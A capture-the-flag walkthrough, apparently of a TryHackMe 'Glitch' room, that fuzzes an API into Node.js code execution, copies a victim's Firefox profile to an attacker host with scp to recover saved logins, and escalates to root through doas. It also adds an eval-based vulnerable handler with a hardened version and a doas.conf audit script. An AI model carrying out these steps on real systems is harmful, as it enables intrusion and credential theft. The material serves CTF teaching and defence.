 
nmap
 
 
homepage
 
 
On the home page, we are greeted by a glitch image with a "not allowed" title.
 
view-source:
 
 
This JavaScript snippet defines a function called getAccess, but the function doesn't seem to be called anywhere.
 
 
The token we receive from the /api/access endpoint is base64-encoded.
 
 
Let's add the token through the browser's developer tools (F12) and refresh the page.
 
 
Meanwhile, gobuster found the /secret page.
 
 
Let's view the secret page while the scanning continues.
 
 
Nothing.
 
Yeah, I'm mad.
 
js.
 
 
/api/items:
 
 
If we try a POST instead of a GET against this endpoint, we get the message below.
 
 
Let's see if we can find parameters that /api/items accepts:
 

wfuzz -c -z file,objects.txt -X POST --hc 404,400 http://glitch.thm/api/items\?FUZZ\=test

 
Okay, we have a cmd parameter.
 
https://medium.com/@sebnemK/node-js-rce-and-a-simple-reverse-shell-ctf-1b2de51c1a44
 
Using the method from that article, with our reverse shell URL-encoded via Burp, we get a callback.
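To show what makes the cmd parameter dangerous and how it should have been written, here is an added Node.js example. It is not the room's real source: the vulnerable handler reproduces the pattern the linked article describes (a request parameter handed to eval), and the handler names, the "item" parameter, the inventory and the error messages are all assumptions.

```javascript
// Added example, not the room's real source: the vulnerable pattern behind the
// "cmd" parameter (a Node.js handler that passes a request parameter to eval),
// next to a hardened handler that never evaluates client input. Names
// (vulnerableItemsHandler, hardenedItemsHandler, the "item" parameter, the
// inventory and the messages) are assumptions.

// Constructed stand-in for the data /api/items serves.
const ITEMS = {
  'glitch-hat': { price: 10 },
  'glitch-shirt': { price: 25 },
};

// VULNERABLE: the value of "cmd" is executed as JavaScript inside the server
// process, so any expression the client sends runs with the server's rights.
function vulnerableItemsHandler(params) {
  if (typeof params.cmd !== 'string') {
    return { status: 400, body: 'missing cmd parameter' }; // constructed message
  }
  try {
    return { status: 200, body: String(eval(params.cmd)) };
  } catch (err) {
    return { status: 500, body: `error: ${err.message}` };
  }
}

// HARDENED: no code execution at all. The client may only name an item from a
// fixed allow-list; hasOwnProperty keeps prototype names such as "constructor"
// from resolving, and everything else is rejected before any lookup happens.
function hardenedItemsHandler(params) {
  const name = params.item;
  if (typeof name !== 'string' || !Object.prototype.hasOwnProperty.call(ITEMS, name)) {
    return { status: 400, body: 'unknown item' };
  }
  return { status: 200, body: JSON.stringify(ITEMS[name]) };
}

// Demonstration: the same request against both handlers.
console.log(vulnerableItemsHandler({ cmd: '6*7' }));       // client code ran: body "42"
console.log(hardenedItemsHandler({ cmd: '6*7' }));         // 400, nothing evaluated
console.log(hardenedItemsHandler({ item: 'glitch-hat' })); // 200, plain lookup
```

The fix is not input filtering on top of eval; it is removing eval from the request path entirely and mapping client input onto a closed set of server-side values.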
 
 
noice
 
 
We got our first flag.
 
 
hmmh
 
 
Digging around, I find a .firefox directory in our home. I copy this off and launch Firefox with it to check for anything.
 

tar -cvf firefox.tgz .firefox

scp firefox.tgz user@attackerip:

Then, on the attacker machine:
 

tar xvf ~/firefox.tgz

firefox --profile .firefox/b5w4643p.default-release --allow-downgrade

 
When we launch Firefox with the last command, we can view the saved logins.
 
 
Now we can switch to the v0id user.
 
 
User v0id does not have permission to run the sudo command.
 
 
When we put linpeas.sh on the machine and run it, it reports:
 

[+] Checking doas.conf

permit v0id as root

Basically, doas is a sudo alternative, configured through /etc/doas.conf. Since we want a root shell, we need the doas equivalent of sudo -u root /bin/bash:
 

doas -u root /bin/bash
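For the defending side, the rule linpeas found is worth catching before someone else does. Here is an added shell example, not part of the writeup, that audits a doas.conf for permit rules granting an unrestricted root shell: a rule is flagged when its target is root (stated as "as root", or implied, since root is doas's default target) and it carries no cmd restriction. The sample config and the output format are my own.

```shell
#!/bin/sh
# Added example, not part of the writeup: audit a doas.conf for "permit" rules
# that hand a user an unrestricted root shell. A rule is flagged when its
# target is root (explicit "as root", or implicit, since root is doas's default
# target) and it carries no "cmd" restriction. Output format is my own.

# Reads doas.conf on stdin, prints each risky rule, exits 1 if any were found.
audit_doas_conf() {
  awk '
    /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }   # skip comments and blanks
    $1 == "permit" {
      target = "root"; restricted = 0
      for (i = 2; i <= NF; i++) {
        if ($i == "as" && i < NF) target = $(i + 1)
        if ($i == "cmd") restricted = 1
      }
      if (target == "root" && !restricted) { print "RISK: " $0; found = 1 }
    }
    END { exit found ? 1 : 0 }
  '
}

# Constructed sample: the rule linpeas reported above plus two narrower ones.
SAMPLE_CONF='# constructed doas.conf
permit v0id as root
permit nopass alice as root cmd /usr/bin/systemctl
permit bob as www'

printf '%s\n' "$SAMPLE_CONF" | audit_doas_conf || echo "unrestricted root rules found"
```

Only the first sample rule is reported; the second is limited to one command with cmd and the third targets a non-root user. Narrowing a rule with cmd (and, where needed, args) is the configuration-level fix for what the writeup exploits.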